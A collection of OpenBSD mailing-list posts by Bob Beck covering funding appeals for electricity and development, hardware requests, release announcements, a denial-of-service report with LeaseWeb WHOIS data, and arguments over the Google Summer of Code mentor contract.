http://www.openbsdfoundation.org/campaign2104.html

If you have contributed already - Thank you.
If you can help us by contributing - Please do.
If you know or work for someone who can help us reach our goals,
please contact us.

Sincerely,

-Bob

Re: Request for Funding our Electricity

[Bob Beck]

On Thu, Jan 16, 2014 at 10:58 AM, Daniel Cegiełka
daniel.cegie...@gmail.com wrote:

 Another example: Google will pay even more than $3000 for finding an
 error in OpenSSH (Core infrastructure network services) - do they know
 about your problems?

 http://googleonlinesecurity.blogspot.com/2013/10/going-beyond-vulnerability-rewards.html

 Daniel


Yes, we're aware of that program.  However it still comes down to a
bounty for bugfixes or change
of some sort. so it's not a source of sustainable funding, unless we
were to do something like introduce
an annual quota of bugs and convincing looking churn for the sake of
finding them every year. Would
you want to depend upon software in your infrastructure that we were
doing that to?

Re: Request for Funding our Electricity

[Bob Beck]

Yes, I believe so - and we'll be ramping that up shortly . but
realisticly the need is for
donations in general - electricity is one thing that the funding can
be applied to.

On Wed, Jan 15, 2014 at 3:27 AM, Luca Ferrari fluca1...@infinito.it wrote:
 On Tue, Jan 14, 2014 at 9:18 PM, Bob Beck b...@openbsdfoundation.org wrote:
 And actually, if you're reading this, you can help by passing this on
 to people you know *off these lists*.

 Is it worth to post a call for support on the official website
 front-page (and the foundation one too)? Just to emphasize the need
 for electricity now.

 Luca

Re: Request for Funding our Electricity

[Bob Beck]

   Just to bring this issue back to the forefront.

In light of shrinking funding, we do need to look for a source to
cover project expenses.  If need be the OpenBSD Foundation can be
involved in receiving donations to cover project electrical costs.

But the fact is right now, OpenBSD will shut down if we do not have
the funding to keep the lights on.

If you or a company you know are able to assist us, it would be
greatly appreciated, but right now we are looking at a significant
funding shortfall for the upcoming year - Meaning the project won't be
able to cover 20 thousand dollars in electrical expenses before being
able to use money for other things. That sort of situation is not
sustainable.




On Fri, Dec 20, 2013 at 5:08 PM, Theo de Raadt dera...@cvs.openbsd.org wrote:
 I am resending this request for funding our electricity bills because
 it is not yet resolved.

 We really need even more funding beyond that, because otherwise all of
 this is simply unsustainable.  This request is the smallest we can
 make.

 ---

 Hi everyone.

 The OpenBSD project uses a lot of electricity for running the
 development and build machines.  A number of logistical reasons
 prevents us from moving the machines to another location which might
 offer space/power for free, so let's not allow the conversation to go
 that way.

 We are looking for a Canadian company who will take on our electrical
 expenses -- on their books, rather than on our books.  We would be
 happiest to find someone who will do this on an annual recurring
 basis.

 That way the various OpenBSD efforts can be supported, yet written off
 as an off-site operations cost by such a company.  If we reduce this
 cost, it will leave more money for other parts of the project.

 We think that a Canadian company is the best choice for accounting
 reasons.  If a company in some other jurisdiction feels they can also
 do this successfully, we'd be very happy to hear from them as well.

 I am not going to disclose the actual numbers here.  Please contact me
 for details if serious.

 Thanks.

Re: Request for Funding our Electricity

[Bob Beck]

And actually, if you're reading this, you can help by passing this on
to people you know *off these lists*.

When we post to these mailing lists saying these things we are asking
for your help to get the word out to
people who support open source projects. Those people are not
necessarily here, and often, you (the people
who use it and work with it) need to make the case to them that their
support is important - far better that
explanation comes from you rather than someone they don't know.

-Bob


On Tue, Jan 14, 2014 at 1:03 PM, Bob Beck b...@openbsdfoundation.org wrote:
Just to bring this issue back to the forefront.

 In light of shrinking funding, we do need to look for a source to
 cover project expenses.  If need be the OpenBSD Foundation can be
 involved in receiving donations to cover project electrical costs.

 But the fact is right now, OpenBSD will shut down if we do not have
 the funding to keep the lights on.

 If you or a company you know are able to assist us, it would be
 greatly appreciated, but right now we are looking at a significant
 funding shortfall for the upcoming year - Meaning the project won't be
 able to cover 20 thousand dollars in electrical expenses before being
 able to use money for other things. That sort of situation is not
 sustainable.




 On Fri, Dec 20, 2013 at 5:08 PM, Theo de Raadt dera...@cvs.openbsd.org 
 wrote:
 I am resending this request for funding our electricity bills because
 it is not yet resolved.

 We really need even more funding beyond that, because otherwise all of
 this is simply unsustainable.  This request is the smallest we can
 make.

 ---

 Hi everyone.

 The OpenBSD project uses a lot of electricity for running the
 development and build machines.  A number of logistical reasons
 prevents us from moving the machines to another location which might
 offer space/power for free, so let's not allow the conversation to go
 that way.

 We are looking for a Canadian company who will take on our electrical
 expenses -- on their books, rather than on our books.  We would be
 happiest to find someone who will do this on an annual recurring
 basis.

 That way the various OpenBSD efforts can be supported, yet written off
 as an off-site operations cost by such a company.  If we reduce this
 cost, it will leave more money for other parts of the project.

 We think that a Canadian company is the best choice for accounting
 reasons.  If a company in some other jurisdiction feels they can also
 do this successfully, we'd be very happy to hear from them as well.

 I am not going to disclose the actual numbers here.  Please contact me
 for details if serious.

 Thanks.

Re: Request for Funding our Electricity

[Bob Beck]

Kiril, a dedicated one purpose bank account or officially directed
donations are somewhat problematic to a canadian not for profit -
Normally for expenses the foundation supports we simply re-imburse the
individuals for their costs from our funds.

As far as the suggested donation meter that's an idea we'd probably
like to put up - as it gets that crowdsourcing type
interest going. But in this case it would likely not be 20K, more like
a 150K yearly goal would be best.


On Tue, Jan 14, 2014 at 2:16 PM, Kirill Bychkov ki...@linklevel.net wrote:
 On Wed, January 15, 2014 00:03, Bob Beck wrote:
Just to bring this issue back to the forefront.

 In light of shrinking funding, we do need to look for a source to
 cover project expenses.  If need be the OpenBSD Foundation can be
 involved in receiving donations to cover project electrical costs.

 But the fact is right now, OpenBSD will shut down if we do not have
 the funding to keep the lights on.

 If you or a company you know are able to assist us, it would be
 greatly appreciated, but right now we are looking at a significant
 funding shortfall for the upcoming year - Meaning the project won't be
 able to cover 20 thousand dollars in electrical expenses before being
 able to use money for other things. That sort of situation is not
 sustainable.


 Hi. Could we collect this sum on special bank account, to gather correct sum
 for covering electricity expenses?
 Or OpenBSD Foundation will pay a bill from it's funds?
 Simplier - should I send money to Foundation right now or should I wait info
 about direct-electricity-expenses-acccount? Unfortunately I can't send $20k,
 but if 200 community members send $100 each...
 I hope this will help to have another year for searching a company Theo was
 mentioning in his irst letter.



 On Fri, Dec 20, 2013 at 5:08 PM, Theo de Raadt dera...@cvs.openbsd.org
 wrote:
 I am resending this request for funding our electricity bills because
 it is not yet resolved.

 We really need even more funding beyond that, because otherwise all of
 this is simply unsustainable.  This request is the smallest we can
 make.

 ---

 Hi everyone.

 The OpenBSD project uses a lot of electricity for running the
 development and build machines.  A number of logistical reasons
 prevents us from moving the machines to another location which might
 offer space/power for free, so let's not allow the conversation to go
 that way.

 We are looking for a Canadian company who will take on our electrical
 expenses -- on their books, rather than on our books.  We would be
 happiest to find someone who will do this on an annual recurring
 basis.

 That way the various OpenBSD efforts can be supported, yet written off
 as an off-site operations cost by such a company.  If we reduce this
 cost, it will leave more money for other parts of the project.

 We think that a Canadian company is the best choice for accounting
 reasons.  If a company in some other jurisdiction feels they can also
 do this successfully, we'd be very happy to hear from them as well.

 I am not going to disclose the actual numbers here.  Please contact me
 for details if serious.

 Thanks.

The OpenBSD Foundation now accepts BitCoin donations...

[Bob Beck]

I'm happy to announce the OpenBSD foundation can now accept donations
to assist in funding project activities in BTC.

We are using BitPay.com to host our BitCoin donations, which are converted
to CAD for use by the project.

If you have been interested in making donations in BitCoin, please visit
http://www.openbsdfoundation.org/donations.html, and visit the BitCoin
donation link at the bottom of the page.


Thanks,

-Bob

Re: softdep issue in 5.3-current ?

[Bob Beck]

Update to something that has version 1.27 of sys/kern/vfs_biomem.c and tell
me if you still have the issue.

On Wed, Jun 26, 2013 at 4:35 AM, Tori Mus torimus...@gmail.com wrote:
 Hi,

 I'm running current snapshot of OpenBSD on amd64 architecture, MP kernel
 (Lenovo Thinkpad to be concrete). Based on the official docs tried to tune
 disk performance by adding `softdep' mounting option for ffs slices.

 After updating of /etc/fstab and clean reboot, checked all particular
 slices like /home, /usr etc. are really mounted with softdep.

 The issue is about much worse performance then with the default nosoftdep.
 Now, for example, when extracting ports.tar.gz snapshot in /usr, other
 process cann't open even small files without very long delays like vi
 $HOME/.profile takes about 2 minutes whereas cpu usage shown with top is
 about 5% only ! Turning off softdep redeems the access time of the
 previous  example to about 4 seconds.

 I've searched mailing lists and read about softdep regression on OpenBSD
 4.8 that was later fixed. Is this regression back. Does anybody else
 experiences similar behaviour ?

Still looking for 1U servers in western canada.

[Bob Beck]

I'm still looking for 1U servers in western canada. we have an
opportunity to build a better build infrastructure for ports but need
the gear to do it with.

I would be keenly interested in

1) Workable semi-modern amd64 capable intel hardware, 1U - 4 GB of ram
or more is nice,  One disk drive. (more is nice too).  needs a working
serial port for serial console,
Would be very nice to get 10 or so of these for parallel dpb infrastructure

2) Sparc64 based 1U machines such as sun V210 or V215.. similar to above needs.

If they have rails for rack mounting that's even better.

They're needed in Edmonton, Alberta - where we have a nice place to host them.

Call for support to continue Radeon KMS work...

[Bob Beck]

Some of you may be aware of the recent developments in current that
have brought us Intel KMS Support. With this we get proper
accellerated X on current and future Intel graphics hardware. There
are a few other nice side benefits to this work:

 - We gain the ability to use the kernel debugger and get debugging
information when the system panics when you are in X windows. 

 - This also provides support for modern graphics outputs like HDMI
and DisplayPort. 

Work on this was largely done by Jonathan Gray (jsg@), and was
supported by a generous sponsorship from M:Tier
(http://www.mtier.org), and by funds from the OpenBSD Foundation. We
would especially like to thank M:Tier at this time for that support. 

We would like to extend this work to support the ATI/AMD Radeon
graphics hardware. To this end the Foundation as well as M:Tier have
comitted to support Jonathan to continue the work done for Intel and
extend it to the Radeon platform. Jonathan has started this work and
basic KMS support is already working - however there is still a lot to
do. 

At of this time the Foundation lacks sufficient funds to follow this
work through to completion. To that end, we are actively looking for a
company or companies that could commit to supporting these efforts so
that Radeon KMS support may be completed.  We are looking for a total
sponsorship goal of approximately $40,000.  If you or your company can
help with these efforts, please contact the OpenBSD Foundation
(http://www.openbsdfoundation.org). We can either accept your
donations directly or make other arrangements. 

Thank you,

-Bob

Need for modern i386/amd64 machines in Edmonton AB.

[Bob Beck]

The project is looking for some modern i386/amd64 machines in
edmonton, AB. They need to be relatively recent, and rack mountable. Ideally
they should have rails, or the ability to find rack mount rails for them. 

1U is best, ideally something that runs OpenBSD well. 

We're trying to use this to expand and beef up our ports building
infrastructure, to reduce port build latencies and reduce associated
costs to the project.

If you have something that could be gotten to us in Edmonton, or
nearby, please let me know the details.  

Thanks
-Bob

CD ordering problems in the last day or so fixed.

[Bob Beck]

   The https.openbsd.org machines were under a denial of service attack
originating from LeaseWeb USA and LeasWeb Netherlands:

Their nets have now been filtered and you should be able to
order again. Thank you to those who dropped me a note. 

-Bob

If you know anyone here you could tell them if they care. attack originated
from multiple IP's on both their USA and Netherlands networks.


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
%   To receive output for a database update, use the -B flag.

% Information related to '94.75.252.64 - 94.75.255.255'

inetnum: 94.75.252.64 - 94.75.255.255
netname: LEASEWEB
descr:   LeaseWeb
descr:   P.O. Box 93054
descr:   1090BB AMSTERDAM
descr:   Netherlands
descr:   www.leaseweb.com
remarks: Please send email to ab...@leaseweb.com for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c:  LSW1-RIPE
status:  ASSIGNED PA
mnt-by:  LEASEWEB-MNT
source:  RIPE # Filtered

person: RIP Mean
address:P.O. Box 93054
address:1090BB AMSTERDAM
address:Netherlands
phone:  +31 20 3162880
fax-no: +31 20 3162890
abuse-mailbox:  ab...@leaseweb.com
nic-hdl:LSW1-RIPE
mnt-by: OCOM-MNT
source: RIPE # Filtered

# The following results may also be obtained via:
# 
http://whois.arin.net/rest/nets;q=108.59.1.227?showDetails=trueshowARIN=falseext=netref2
#

NetRange:   108.59.0.0 - 108.59.15.255
CIDR:   108.59.0.0/20
OriginAS:   AS30633
NetName:LEASEWEB-US
NetHandle:  NET-108-59-0-0-1
Parent: NET-108-0-0-0-0
NetType:Direct Allocation
Comment:LEASE-ARIN
RegDate:2010-11-18
Updated:2012-02-24
Ref:http://whois.arin.net/rest/net/NET-108-59-0-0-1

OrgName:Leaseweb USA, Inc.
OrgId:  LU
Address:9480 Innovation Dr
City:   Manassas
StateProv:  VA
PostalCode: 20109
Country:US
RegDate:2010-09-13
Updated:2012-10-09
Comment:www.leaseweb.com
Ref:http://whois.arin.net/rest/org/LU

OpenBSD 5.2 Released

[Bob Beck]

.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Aaron Bieber, Alexander Bluhm, Alexander Hall, Alexander Schrijver,
Alexander Yurchenko, Alexandr Shadchin, Alexandre Ratchov,
Anil Madhavapeddy, Anthony J. Bentley, Antoine Jacoutot,
Austin Hook, Benoit Lecocq, Bob Beck, Brandon Mercer, Bret Lambert,
Brett Mahar, Bryan Steele, Camiel Dobbelaar, Can Erkin Acar,
Charles Longeau, Christian Weisgerber, Christiano F. Haesbaert,
Claudio Jeker, Damien Bergamini, Damien Miller, Darren Tucker,
David Coppa, David Gwynne, David Krause, Edd Barrett, Eric Faurot,
Federico G. Schwindt, Felix Kronlage, Gilles Chehade,
Giovanni Bechis, Gleydson Soares, Gonzalo L. Rodriguez,
Henning Brauer, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jakob Schlyter, Janne Johansson, Jason George, Jason McIntyre,
Jasper Lievisse Adriaanse, Jeremy Evans, Jim Razmus II, Joel Knight,
Joel Sing, Joerg Zinke, Jolan Luff, Jonathan Armani, Jonathan Gray,
Jonathan Matthew, Jordan Hargrave, Joshua Elsasser, Joshua Stein,
Kenji Aoyama, Kenneth R Westerback, Kirill Bychkov, Kurt Miller,
Landry Breuil, Laurent Fanis, Lawrence Teo, Luke Tymowski,
Marc Espie, Marco Pfatschbacher, Marcus Glocker, Mark Kettenis,
Mark Lumsden, Markus Friedl, Martin Pieuchot, Martynas Venckus,
Mats O Jansson, Matthew Dempsky, Matthias Kilian, Matthieu Herrb,
Michael Erdely, Mike Belopuhov, Mike Larkin, Miod Vallat,
Nayden Markatchev, Nicholas Marriott, Nick Holland, Nigel Taylor,
Okan Demirmen, Otto Moerbeek, Pascal Stumpf, Paul de Weerd,
Paul Irofti, Peter Hessler, Peter Valchev, Philip Guenther,
Pierre-Emmanuel Andre, Pierre-Yves Ritschard, Remi Pointel,
Robert Nagy, Ryan Freeman, Ryan Thomas McBride, Sasano,
Sebastian Benoit, Sebastian Reitenbach, Simon Perreault,
Stefan Sperling, Stephan A. Rickauer, Steven Mestdagh,
Stuart Cassoff, Stuart Henderson, Takuya Asada, Ted Unangst,
Theo de Raadt, Tobias Stoeckmann, Tobias Weingartner,
Todd C. Miller, Todd Fries, Will Maier, William Yodlowsky,
Yasuoka Masahiko, Yojiro Uo

ftp/www.openbsd.org downtime today. don't panic

[Bob Beck]

Hi Folks,

The main web, ftp, and anoncvs servers are going to be down for a
short period today while they move from data center to data center at
the University of Alberta.  The University has been so kind as to
offer the project space in two racks in their new state of the art
data centre in a new building, and we are moving equipment into the
new place.  We will minimize the downtime as much as possible, but it
will be for a short while (likelye an hour or so) as we pick up the
gear and move it.  Please don't panic.

Thanks,

-Bob

Re: quick query.

[Bob Beck]

It is for me

#export PKG_PATH=http://ftp.openbsd.org/pub/OpenBSD/snapshots/packages/amd64
# pkg_add tor
tor-0.2.2.39: ok
The following new rcscripts were installed: /etc/rc.d/tor
See rc.d(8) for details.
# pkg_info tor
Information for inst:tor-0.2.2.39

Comment:
anonymity service using onion routing

Description:
Tor is a connection-based low-latency anonymous communication system that
protects TCP streams: web browsing, instant messaging, irc, ssh, etc.

Maintainer: Pascal Stumpf pascal.stu...@cubes.de

WWW: http://www.torproject.org/



Looks like PEBKAC.


On Wed, Oct 10, 2012 at 4:48 PM, sharon dvir bpmcont...@gmail.com wrote:
 it looks like Tor just isn't there.
 which means that in order to go from 2.2.35 to 2.2.39 i'll have to compile
 it manually.
 which is no problem, but hence a need for the tool i originally asked
 about.
 or am i missing something?
 BTW, 2.2.39 fixes some remote exploits for Tor, in case anyone is running
 it.
 thanks everyone.

 On 10 October 2012 18:09, Peter N. M. Hansteen pe...@bsdly.net wrote:

 Martin Pelikan martin.peli...@gmail.com writes:

  as sthen@ kindly corrected me the some time ago, we now have
  pkg.conf(5) and installpath.

 You're right of course -- pkg.conf has been with us for a while (first
 appearance in 4.8 it seems).

  This way it'll work even if you don't invoke package updates from your
  shell, but using some kind of remote administration software for
  example.

 Yes. That functionality would be relevant to the OP. I'd managed to
 forget all about it, probably because the old .profile trick works so
 well in other contexts.

 - P

 --
 Peter N. M. Hansteen, member of the first RFC 1149 implementation team
 http://bsdly.blogspot.com/ http://www.bsdly.net/ http://www.nuug.no/
 Remember to set the evil bit on all malicious network traffic
 delilah spamd[29949]: 85.152.224.147: disconnected after 42673 seconds.

OpenBSD 5.2 song - and pre-orders for 5.2!

[Bob Beck]

We have made available the song that will come out
with the 5.2 release. The song and details of it are linked
from:

http://openbsd.org/lyrics.html

Go have a look and a listen!

The details for the upcoming 5.2 release are available at

http://www.openbsd.org/52.html

A reminder to you all that Pre-orders for 5.2 are can be made
by starting from:

http://openbsd.org/orders.html

Please consider buying a CD or three.  Sales of CD's and merchandise
are vital to OpenBSD's continued existence.  It is only this revenue stream
that keeps the power and air conditionong on, and keeps us all hacking.

   Thanks!

Re: OpenBSD - UEFI Secure Boot

[Bob Beck]

On Sat, Jul 7, 2012 at 11:25 AM, Tomas Bodzar tomas.bod...@gmail.comwrote:


 World is trying much worse stuff than UEFI

 http://extratorrent.com/article/2263/uk+prime+minister+calls+for+online+porn+ban.html



What? they're going to ban porn? That's it, I'm quitting the internets.

OpenBSD 5.1 released May 1, 2012

[Bob Beck]

.  The 5.1 ports collection,
including many of the distribution files, is included on the 3-CD
set.  Please see the PORTS file for more information.

Note: some of the most popular ports, e.g., the Apache web server
and several X applications, come standard with OpenBSD.  Also, many
popular ports have been pre-compiled for those who do not desire
to build their own binaries (see BINARY PACKAGES, below).
A large number of binary packages are provided.  Please see the PACKAGES
file (ftp://ftp.OpenBSD.org/pub/OpenBSD/5.1/PACKAGES) for more details.
The CD-ROMs contain source code for all the subsystems explained
above, and the README (ftp://ftp.OpenBSD.org/pub/OpenBSD/5.1/README)
file explains how to deal with these source files.  For those who
are doing an FTP install, the source code for all four subsystems
can be found in the pub/OpenBSD/5.1/ directory:

xenocara.tar.gz ports.tar.gz   src.tar.gz sys.tar.gz
Ports tree and package building by Jasper Lievisse Adriaanse,
Landry Breuil, Michael Erdely, Stuart Henderson, Peter Hessler,
Paul Irofti, Antoine Jacoutot, Robert Nagy, and Christian Weisgerber.
System builds by Theo de Raadt, Mark Kettenis, and Miod Vallat.
X11 builds by Todd Fries and Miod Vallat.  ISO-9660 filesystem
layout by Theo de Raadt.

We would like to thank all of the people who sent in bug reports, bug
fixes, donation cheques, and hardware that we use.  We would also like
to thank those who pre-ordered the 5.1 CD-ROM or bought our previous
CD-ROMs.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Alexander Bluhm, Alexander Hall, Alexander Schrijver,
Alexander Yurchenko, Alexandr Shadchin, Alexandre Ratchov,
Anil Madhavapeddy, Anthony J. Bentley, Antoine Jacoutot,
Ariane van der Steldt, Austin Hook, Benoit Lecocq, Bernd Ahlers,
Bob Beck, Bret Lambert, Bryan Steele, Camiel Dobbelaar,
Can Erkin Acar, Charles Longeau, Chris Kuethe, Christian Weisgerber,
Christiano F. Haesbaert, Claudio Jeker, Dale Rahn, Damien Bergamini,
Damien Miller, Darren Tucker, David Coppa, David Gwynne, David Hill,
David Krause, Edd Barrett, Eric Faurot, Federico G. Schwindt,
Felix Kronlage, Gilles Chehade, Giovanni Bechis, Gleydson Soares,
Henning Brauer, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jacek Masiulaniec, Jakob Schlyter, Janne Johansson, Jason George,
Jason McIntyre, Jason Meltzer, Jasper Lievisse Adriaanse,
Jeremy Evans, Jim Razmus II, Joel Knight, Joel Sing, Joerg Zinke,
Jolan Luff, Jonathan Armani, Jonathan Gray, Jonathan Matthew,
Jordan Hargrave, Joshua Elsasser, Joshua Stein, Kenji Aoyama,
Kenneth R Westerback, Kevin Lo, Kevin Steves, Kurt Miller,
Landry Breuil, Laurent Fanis, Luke Tymowski, Marc Espie,
Marco Pfatschbacher, Marcus Glocker, Mark Kettenis, Mark Lumsden,
Mark Uemura, Markus Friedl, Martin Pieuchot, Martynas Venckus,
Mats O Jansson, Matthew Dempsky, Matthias Kilian, Matthieu Herrb,
Michael Erdely, Mike Belopuhov, Mike Larkin, Miod Vallat,
Nayden Markatchev, Nicholas Marriott, Nick Holland, Nigel Taylor,
Nikolay Sturm, Okan Demirmen, Otto Moerbeek, Owain Ainsworth,
Pascal Stumpf, Paul de Weerd, Paul Irofti, Peter Hessler,
Peter Valchev, Philip Guenther, Pierre-Emmanuel Andre,
Pierre-Yves Ritschard, Remi Pointel, Reyk Floeter, Robert Nagy,
Ryan Freeman, Ryan Thomas McBride, Sasano, Sebastian Benoit,
Sebastian Reitenbach, Simon Bertrang, Simon Perreault,
Stefan Sperling, Stephan A. Rickauer, Steven Mestdagh,
Stuart Cassoff, Stuart Henderson, Takuya Asada, Ted Unangst,
Theo de Raadt, Thordur I Bjornsson, Tobias Stoeckmann,
Tobias Weingartner, Todd C. Miller, Todd Fries, Uwe Stuehler,
Will Maier, William Yodlowsky, Yasuoka Masahiko, Yojiro Uo

Re: Google SoC 2012 is accepting open source organisations

[Bob Beck]

 Actually, there are a couple of organisations that are willing to act as
 a proxy for the payments to organisations that are unable to deal with
 the legalities imposed by the US IRS - it is not just foreigners that
 have issues some projects inside the US just don't have the ability to
 deal with the tax monster.  I cannot recall which ones they
 are at the moment, if asked they will take the money from google and
 hand it on.  Just ask on the GSoC mentors mailing list.


I know of no such mailing list, and certainly Google didn't put me on
to it when I had problems with their contract.

If you guys want this so freaking badly wake up.. I'm right here. I'm
willing to write the project proposals working with the other
developers, and I'm willing to supervise and mentor a worthy few
students.  I'm not willing to put myself, or the OpenBSD foundation,
in a nasty legal situation over this.  If some proxy organization will
deal with the damn google contract, then they need to talk to me. You
guys want it, put people in touch with me.

Re: Google SoC 2012 is accepting open source organisations

[Bob Beck]

  I have done GSoC as a mentor before though I have
 not been the admin for a project

Have you dealt with the google contract then?

Re: Google SoC 2012 is accepting open source organisations

[Bob Beck]

 1) The OpenBSD Foundation is NOT OpenBSD.

 2) That application never elicited a reply from Google, so no
 contract to read or sign was presented or known of.

 3) At some later point the required contract was obtained and, as Theo
 has said, nobody in the OpenBSD project or at the OpenBSD Foundation
 was interested in signing it after reading it.


In a nutshell, I'm the guy who is willing to take on some personal
responsibility
in order to have this happen. However when the contract is put in front of
me and I (as a non USA person) ask questions about it, basically the people at
Google stop answering.  I don't personally blame them, they are techies, they
are trying to do the right thing. However they don't end up in a position where
they are able to talk to anyone at the company about the pitfalls of someone
foreign signing something with USA tax consequences.

Heck as the supervisor they want to give me money - an Hororarium. I don't
*want* the money because it causes me problems personally to accept it from
them (and when signing something as a director of a Canadian not for profit
I actually can't legally take it!) and while they seem able to say they will not
give me the money, they can't remove all the parts of the contract about me
taking the money that give me problems.  I would just like to get the interested
student the money.  However it has always bogged down around issues like
this.

Unfortunately this all gets turned into we don't want to participate in SOC.
this isn't true for all of us. I would be willing to try, and have. it
just has not
been workable for an entity that does not have a legal presence in the
United States.

I'm always willing to try again if this message is read by someone at Google
who can untangle the bureaucracy...

Re: Google SoC 2012 is accepting open source organisations

[Bob Beck]

 they didn't say that Theo refused to sign any paper. Just wonder, what kind
 of responsibilty that paper was about ? Accepting student's code to OpenBSD
 code base or something ?

No, it's actually about personal liability for the mentor (i.e. me) for taxes
and other such nonsense.  Google SOC actually does *not* require that
the code be accepted into the project at the end.  Fundamentally, I have no
objections to the principle of summer of code, it's the byzantine paperwork
and scary contract I have to sign as a mentor to do this for you. I'm more
than willing to hang my personal ass out there a little bit for this, working
at a university I can sort of blah blah blah a lot of the legal crap when it
comes to students, but I do have my limits.. sorry... and as soon as I delete
objectionable bits in the contract, the dialogue with the Googlers stops,  I
suspect because they can't get any traction with their internal legal people.

Re: Google SoC 2012 is accepting open source organisations

[Bob Beck]

 at first, I'd notice, 3) != 4), right ?

May not be the same, however they do want mentorship from somwhere associated
to the projects.

 at second, taxes are rather government thing, not googlish ? why should I
 sign something with Google about taxes ? It doesn't make any sense.

Because companies in the usa just do this.. whether it is to avoid
paying taxes or to keep the governmental tax-gestapo at bay..

I don't pretend for it to make sense.

Anyone got a 48 port gigabit switch, small and lower power? looking for a good home?

[Bob Beck]

OpenBSD's building infrastructure has a need for such things. if you
are in the process of rewhacking your network, I would love to hear
from you if you have such beasts that might be sent our way.

We are looking to get these things in Calgary, Canada.

Re: locate weirdness

[Bob Beck]

 So, you're advocating incomplete information? Is that not a bigger problem?

No, we don't support old releases. 4.3 is very old. You should update
your OS to something supported, and likely your problem will go away.

Openbsd 4.9 released May 1, 2011

[Bob Beck]

 and macppc.  During installation, you can install
X.Org quite easily.  Be sure to try out xdm(1) and see how we have
customized it for OpenBSD.
The OpenBSD ports tree contains automated instructions for building
third party software.  The software has been verified to build and
run on the various OpenBSD architectures.  The 4.9 ports collection,
including many of the distribution files, is included on the 3-CD
set.  Please see the PORTS file for more information.

Note: some of the most popular ports, e.g., the Apache web server
and several X applications, come standard with OpenBSD.  Also, many
popular ports have been pre-compiled for those who do not desire
to build their own binaries (see BINARY PACKAGES, below).
A large number of binary packages are provided.  Please see the PACKAGES
file (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.9/PACKAGES) for more details.
The CD-ROMs contain source code for all the subsystems explained
above, and the README (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.9/README)
file explains how to deal with these source files.  For those who
are doing an FTP install, the source code for all four subsystems
can be found in the pub/OpenBSD/4.9/ directory:

xenocara.tar.gz ports.tar.gz   src.tar.gz sys.tar.gz
Ports tree and package building by Jasper Lievisse Adriaanse,
Landry Breuil, Michael Erdely, Stuart Henderson, Peter Hessler,
Paul Irofti, Antoine Jacoutot, Robert Nagy, and Christian Weisgerber.
System builds by Theo de Raadt, Mark Kettenis, and Miod Vallat.
X11 builds by Todd Fries and Miod Vallat.  ISO-9660 filesystem
layout by Theo de Raadt.

We would like to thank all of the people who sent in bug reports, bug
fixes, donation cheques, and hardware that we use.  We would also like
to thank those who pre-ordered the 4.9 CD-ROM or bought our previous
CD-ROMs.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Aleksander Piotrowski, Alexander Bluhm, Alexander Hall,
Alexander Yurchenko, Alexandr Shadchin, Alexandre Ratchov,
Antoine Jacoutot, Ariane van der Steldt, Artur Grabowski,
Austin Hook, Benoit Lecocq, Bernd Ahlers, Bob Beck, Bret Lambert,
Camiel Dobbelaar, Can Erkin Acar, Charles Longeau, Chris Kuethe,
Christian Weisgerber, Claudio Jeker, Dale Rahn, Damien Bergamini,
Damien Miller, Darren Tucker, David Coppa, David Gwynne, David Hill,
David Krause, Edd Barrett, Eric Faurot, Federico G. Schwindt,
Felix Kronlage, Gilles Chehade, Giovanni Bechis, Henning Brauer,
Hikaru Abe, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jacek Masiulaniec, Jacob Meuser, Jakob Schlyter, James Wright,
Janne Johansson, Jason George, Jason McIntyre, Jason Meltzer,
Jasper Lievisse Adriaanse, Jeremy Evans, Jim Razmus II, Joel Sing,
Johan Mson Suorra, Jolan Luff, Jonathan Armani, Jonathan Gray,
Jordan Hargrave, Joshua Elsasser, Joshua Stein,
Kenneth R Westerback, Kevin Lo, Kevin Steves, Kjell Wooding,
Kurt Miller, Landry Breuil, Laurent Fanis, Marc Espie,
Marco Peereboom, Marco Pfatschbacher, Marcus Glocker, Mark Kettenis,
Mark Lumsden, Mark Uemura, Markus Friedl, Martin Hedenfalk,
Martynas Venckus, Mathieu Sauve-Frankel, Mats O Jansson,
Matthew Dempsky, Matthias Kilian, Matthieu Herrb, Michael Erdely,
Michael Knudsen, Michele Marchetto, Mike Belopuhov, Mike Larkin,
Miod Vallat, Nicholas Marriott, Nick Holland, Nikolay Sturm,
Okan Demirmen, Oleg Safiullin, Otto Moerbeek, Owain Ainsworth,
Ozawa Tsuyoshi, Paul de Weerd, Paul Irofti, Peter Hessler,
Peter Valchev, Philip Guenther, Pierre-Emmanuel Andre,
Pierre-Yves Ritschard, Ray Lai, Remi Pointel, Reyk Floeter,
Robert Nagy, Ryan Thomas McBride, Ryo Shimizu, Sasano,
Sebastian Reitenbach, Stefan Sperling, Stephan A. Rickauer,
Steven Mestdagh, Stuart Cassoff, Stuart Henderson, Suenaga Hiroki,
Takuya Asada, Ted Unangst, Theo de Raadt, Thordur I Bjornsson,
Tobias Stoeckmann, Tobias Weingartner, Todd C. Miller, Todd Fries,
Will Maier, William Yodlowsky, Xavier Santolaria, Yasuoka Masahiko,
Yojiro Uo

Like OpenBSD? Like to see new stuff happening? You really need to order a CD today :)

[Bob Beck]

 Hi all,

   A number of you may have noticed the recent flurry of activity,
leading to stuff
like bigmem being turned on.. Some more good stuff is coming soon (my amd64
at my house is using 7 gigabyes of memory for buffer cache, and I'm doing builds
without touching disks..).  Some really cool stuff is being worked on
and is coming
to a source tree near you soon.

   However, I'd like to take the opportunity to remind you all, that
the project does
depend on CD and shirt sales to keep it alive.  Yes you may not use a
CD all the
time, but the latest one is pretty cool.

  So, short answer? go buy a CD.  pre-orders are a little slow this
release, and we need
to see some more activity in that area.

  Then maybe I'll stop worrying about it and commit that thing that
will make your
amd64 use even  more buttloads of memory too!

   So - yes we like donations, but we also like CD sales.. now is the
time to help out.

Thanks

-Bob

Re: OpenBSD 4.8 freezes on certain activities

[Bob Beck]

